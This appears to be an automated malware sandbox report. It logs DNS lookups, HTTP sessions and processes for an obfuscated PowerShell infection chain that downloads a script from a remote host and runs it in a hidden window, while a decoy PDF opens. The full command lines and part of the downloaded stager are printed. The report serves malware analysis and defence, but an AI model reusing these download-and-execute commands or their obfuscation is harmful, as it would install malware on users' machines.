Dec 19, 2024 11:56:20.816178083 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.816207886 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:20.816446066 CET | 49738 | 443 | 192.168.2.6 | 107.161.23.150
Dec 19, 2024 11:56:21.392179012 CET | 49754 | 80 | 192.168.2.6 | 203.175.174.69
Dec 19, 2024 11:56:21.512140036 CET | 80 | 49754 | 203.175.174.69 | 192.168.2.6
Dec 19, 2024 11:56:21.512227058 CET | 49754 | 80 | 192.168.2.6 | 203.175.174.69
Dec 19, 2024 11:56:21.512423992 CET | 49754 | 80 | 192.168.2.6 | 203.175.174.69
Dec 19, 2024 11:56:21.631963968 CET | 80 | 49754 | 203.175.174.69 | 192.168.2.6
Dec 19, 2024 11:56:23.045954943 CET | 80 | 49754 | 203.175.174.69 | 192.168.2.6
Dec 19, 2024 11:56:23.097244024 CET | 49754 | 80 | 192.168.2.6 | 203.175.174.69
Dec 19, 2024 11:56:23.284553051 CET | 49754 | 80 | 192.168.2.6 | 203.175.174.69
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 11:56:10.653305054 CET | 61043 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 11:56:11.439961910 CET | 53 | 61043 | 1.1.1.1 | 192.168.2.6
Dec 19, 2024 11:56:16.432821989 CET | 60070 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 11:56:17.351166010 CET | 53 | 60070 | 1.1.1.1 | 192.168.2.6
Dec 19, 2024 11:56:20.936860085 CET | 57981 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 11:56:21.391005993 CET | 53 | 57981 | 1.1.1.1 | 192.168.2.6
Dec 19, 2024 11:56:31.539947033 CET | 64454 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 11:56:46.029999018 CET | 49169 | 53 | 192.168.2.6 | 1.1.1.1
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 19, 2024 11:56:10.653305054 CET | 192.168.2.6 | 1.1.1.1 | 0x7fdc | Standard query (0) | www.al-rasikh.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:16.432821989 CET | 192.168.2.6 | 1.1.1.1 | 0xb4b7 | Standard query (0) | www.astenterprises.com.pk | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:20.936860085 CET | 192.168.2.6 | 1.1.1.1 | 0x445 | Standard query (0) | www.bluemaxxlaser.com | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:31.539947033 CET | 192.168.2.6 | 1.1.1.1 | 0xcef3 | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:46.029999018 CET | 192.168.2.6 | 1.1.1.1 | 0xac4a | Standard query (0) | x1.i.lencr.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 19, 2024 11:56:11.439961910 CET | 1.1.1.1 | 192.168.2.6 | 0x7fdc | No error (0) | www.al-rasikh.com | al-rasikh.com | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 11:56:11.439961910 CET | 1.1.1.1 | 192.168.2.6 | 0x7fdc | No error (0) | al-rasikh.com | - | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:17.351166010 CET | 1.1.1.1 | 192.168.2.6 | 0xb4b7 | No error (0) | www.astenterprises.com.pk | astenterprises.com.pk | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 11:56:17.351166010 CET | 1.1.1.1 | 192.168.2.6 | 0xb4b7 | No error (0) | astenterprises.com.pk | - | 107.161.23.150 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:21.391005993 CET | 1.1.1.1 | 192.168.2.6 | 0x445 | No error (0) | www.bluemaxxlaser.com | - | 203.175.174.69 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:31.679470062 CET | 1.1.1.1 | 192.168.2.6 | 0xcef3 | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 11:56:46.168411970 CET | 1.1.1.1 | 192.168.2.6 | 0xac4a | No error (0) | x1.i.lencr.org | crl.root-x1.letsencrypt.org.edgekey.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 19, 2024 11:56:52.819112062 CET | 1.1.1.1 | 192.168.2.6 | 0x2d75 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 19, 2024 11:56:52.819112062 CET | 1.1.1.1 | 192.168.2.6 | 0x2d75 | No error (0) | bg.microsoft.map.fastly.net | - | 199.232.214.172 | A (IP address) | IN (0x0001) | false
                                                              • www.al-rasikh.com
                                                              • www.astenterprises.com.pk
                                                              • www.bluemaxxlaser.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49754 | 203.175.174.69 | 80 | 2744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Dec 19, 2024 11:56:21.512423992 CET | 80 | OUT | GET /ms/ms.vbs HTTP/1.1
  Host: www.bluemaxxlaser.com
  Connection: Keep-Alive
Dec 19, 2024 11:56:23.045954943 CET | 516 | IN | HTTP/1.1 404 Not Found
  Date: Thu, 19 Dec 2024 10:56:22 GMT
  Server: Apache
  Content-Length: 315
  Keep-Alive: timeout=5, max=100
  Connection: Keep-Alive
  Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49721 | 107.161.23.150 | 443 | 2744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 10:56:12 UTC | 176 | OUT | GET /ms/neaters.txt HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: www.al-rasikh.com
  Connection: Keep-Alive
2024-12-19 10:56:13 UTC | 387 | IN | HTTP/1.1 200 OK
  Connection: close
  content-type: text/plain
  last-modified: Thu, 08 Feb 2024 03:04:57 GMT
  accept-ranges: bytes
  content-length: 841
  date: Thu, 19 Dec 2024 10:56:12 GMT
  server: LiteSpeed
  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                              2024-12-19 10:56:13 UTC841INData Raw: 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 20 68 69 64 64 65 6e 20 24 6b 69 6c 6f 34 7a 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6f 35 64 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 6f 35 64 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 66 32 69 75 7a 67 2e 76 62 27 29 29 29 3b 24 66 6c 6f 6c 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 6f 35 64 73 27 27 27 2e 52 65 70 6c 61 63 65 28 27 6f 35 64 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 69 79 73 2e 76 62 27 29 29 29 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 69 74 28 5b 73 74 72 69 6e
                                                              Data Ascii: powershell -win hidden $kilo4z=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\f2iuzg.vb')));$flol=iex($('[Environment]::GetEo5ds'''.Replace('o5d','nvironmentVariable(''public'') + ''\\iys.vb')));function getit([strin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49738 | 107.161.23.150 | 443 | 2744 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-19 10:56:18 UTC | 127 | OUT | GET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
  Host: www.astenterprises.com.pk
  Connection: Keep-Alive
2024-12-19 10:56:19 UTC | 217 | IN | HTTP/1.1 200 OK
  Connection: close
  content-type: application/pdf
  last-modified: Sun, 28 Jan 2024 19:03:01 GMT
  accept-ranges: bytes
  content-length: 871324
  date: Thu, 19 Dec 2024 10:56:18 GMT
  server: LiteSpeed
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                              Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                              Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                              2024-12-19 10:56:19 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                              Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                              2024-12-19 10:56:19 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                              Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                              2024-12-19 10:56:19 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                              Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                              Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                              Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                              Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                              2024-12-19 10:56:19 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                              Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                              2024-12-19 10:56:19 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                              Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


Target ID: 2
Start time: 05:56:06
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" ${kilo4z} = $PSHOME;${*opso25.} = ${kilo4z}[+52 -53 +1] + ${kilo4z}[-11 +2] + 'A' + ${kilo4z}[-66 +55];${o5d.} = $([TYPE]${*opso25.});${*.f2iuzg.} = ${o5d.}::ToString(+79 -1 -5)+${o5d.}::ToString(+79 -1 -5 -4)+${o5d.}::ToString(+79 +30 -10 +21);&(${*.f2iuzg.})(&(${*.f2iuzg.})(${kilo4z}[+52 -53 +1]+'u'+${kilo4z}[-66 +55]+${kilo4z}[-61 +55]+' https://www.al-rasikh.com/ms/neaters.txt -UseBasicParsing'))
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 05:56:06
Start date: 19/12/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 05:56:12
Start date: 19/12/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden C:\Windows\System32\WindowsPowerShell\v1.0=iex "[Environment]::GetEnvironmentVariable('public') + '\\f2iuzg.vbs'"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 9
Start time: 05:56:19
Start date: 19/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
Imagebase: 0x7ff651090000
File size: 5'641'176 bytes
MD5 hash: 24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 10
Start time: 05:56:20
Start date: 19/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase: 0x7ff70df30000
File size: 3'581'912 bytes
MD5 hash: 9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 05:56:21
Start date: 19/12/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase: 0x7ff7403e0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 13
Start time: 05:56:21
Start date: 19/12/2024
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit): false
